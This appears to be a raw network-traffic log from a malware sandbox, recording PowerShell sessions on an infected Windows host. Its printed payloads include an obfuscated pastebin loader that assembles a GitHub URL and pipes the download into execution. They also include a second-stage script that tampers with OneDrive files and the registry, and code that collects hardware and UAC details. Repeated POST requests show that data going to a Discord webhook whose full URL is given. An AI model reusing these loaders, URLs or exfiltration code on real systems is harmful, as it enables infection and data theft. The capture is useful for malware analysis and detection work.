2024-10-15 14:00:00 UTC | 1378 | IN | Data Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
    Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
2024-10-15 14:00:00 UTC | 1378 | IN | Data Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
    Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
2024-10-15 14:00:00 UTC | 1378 | IN | Data Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
    Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
2024-10-15 14:00:00 UTC | 1378 | IN | Data Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
    Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
2024-10-15 14:00:00 UTC | 618 | IN | Data Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
    Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.649763185.199.109.1334431396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:02 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:02 UTC900INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:02 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120100-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729000802.271037,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: e9a29f95479decc915379970715c73aaee90c4a2
                                                            Expires: Tue, 15 Oct 2024 14:05:02 GMT
                                                            Source-Age: 8
                                                            2024-10-15 14:00:02 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 14:00:02 UTC | 1378 | IN
                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 14:00:02 UTC | 1378 | IN
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 14:00:02 UTC | 1378 | IN
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 14:00:02 UTC | 1378 | IN
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 14:00:02 UTC | 618 | IN
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.6 | 49832 | 162.159.136.232 | 443 | 1396 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 14:00:15 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:15 UTC | 299 | OUT
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 14:00:15 UTC | 1259 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:15 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729000817
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jff%2FeMVO2KG17lc8vGu0fRk5DWy%2FjJU23fOMhXWfuWEM2og69ON5FdHTrRS%2F7lRPnuRdrtajEZQeGicHz9%2B2WpVkcWUXDmioWOAUEcdAeldMhKptrUUT%2Bujk1d7U"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=69e39aecfecfdac47cfdc161cc57c10f88539518-1729000815; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=Ho1f9XAeszMYfSRJmyoAWCg.9y_pkJ1rIfYEaAZhERE-1729000815740-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d305599ab2f478d-DFW
                                                            2024-10-15 14:00:15 UTC | 45 | IN
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.6 | 49885 | 172.67.19.24 | 443 | 2248 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 14:00:25 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:25 UTC | 397 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 475
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055d50d790bc7-DFW
                                                            2024-10-15 14:00:25 UTC | 139 | IN
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 14:00:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.6 | 49888 | 162.159.136.232 | 443 | 2536 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 14:00:25 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:25 UTC | 299 | OUT
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 14:00:25 UTC | 1255 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729000826
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWF2vJvMk0W8tny4KPx5%2B9OdLNhXvCQpJMC31ZbJju5XziaPQeLWMs6YUqt2fN03SJf9HMVpAmjOljD7MlqjgkWCFbR4cVtNG%2BTS3Vm4dMBuVU3h2a%2Fv4NP4MJvk"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=TT0GGYcYwONH2Rv7OtXW9F2ggNPn0x86vCodexDNci4-1729000825599-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055d76861e5b5-DFW
                                                            2024-10-15 14:00:25 UTC | 45 | IN
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.6 | 49890 | 162.159.136.232 | 443 | 2992 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 14:00:25 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:25 UTC | 299 | OUT
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 14:00:25 UTC | 1253 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 3
                                                            x-ratelimit-reset: 1729000827
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pCd9sAtAPFvL8TMzqi70eNOKIel4ISsUHchNj2P6Y%2BEwwpTZ3vGIiPmxlPvlXB8zWYsD%2FHJqj7RTwoTBrv2nEoi3MDo5aeCTSs6P59Nij18zK6dsSAt9bFJBQVQ"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=mZqAcWGFCoWOO36NRcRqxgiI4Kd08HYF3S1w_qbNPhI-1729000825638-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055d79a22474e-DFW
                                                            2024-10-15 14:00:25 UTC | 45 | IN
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.6 | 49889 | 162.159.136.232 | 443 | 4040 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 14:00:25 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:25 UTC | 299 | OUT
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 14:00:25 UTC | 1259 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 2
                                                            x-ratelimit-reset: 1729000827
                                                            x-ratelimit-reset-after: 2
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2FjNmdU17uOHYJHxxD7YUtZMp%2Fq1c0fR3XnWVHXpdwkkKjV%2BPlWgmKwHgoqMhIp%2BMQfGfRobQAf9S7O4Ktnj0CgoslX52T%2FbjqwpbJ3S6PPAlgbdlRcL0668qfIl"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=QyY4bEJrOjzhqaN.da..q9PGkGXCVz9.TBkJo9a77QI-1729000825651-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055d7ac80346e-DFW
                                                            2024-10-15 14:00:25 UTC | 45 | IN
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.6 | 49898 | 185.199.109.133 | 443 | 2248 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 14:00:27 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:27 UTC | 901 | IN | HTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:27 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdfw8210138-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729000828.525771,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: ec45f0f9ee12b661b3b5b71e5fa0af62fa85e99e
                                                            Expires: Tue, 15 Oct 2024 14:05:27 GMT
                                                            Source-Age: 33
2024-10-15 14:00:27 UTC | 1378 | IN | Data Ascii:
sleep 5
rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
sleep 5


$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
if (-Not (Test-Path $googoogaagaa)) {
rm $env:tmp\onedrivefilesync.dll -force
New-ItemPropert
2024-10-15 14:00:27 UTC | 1378 | IN | Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
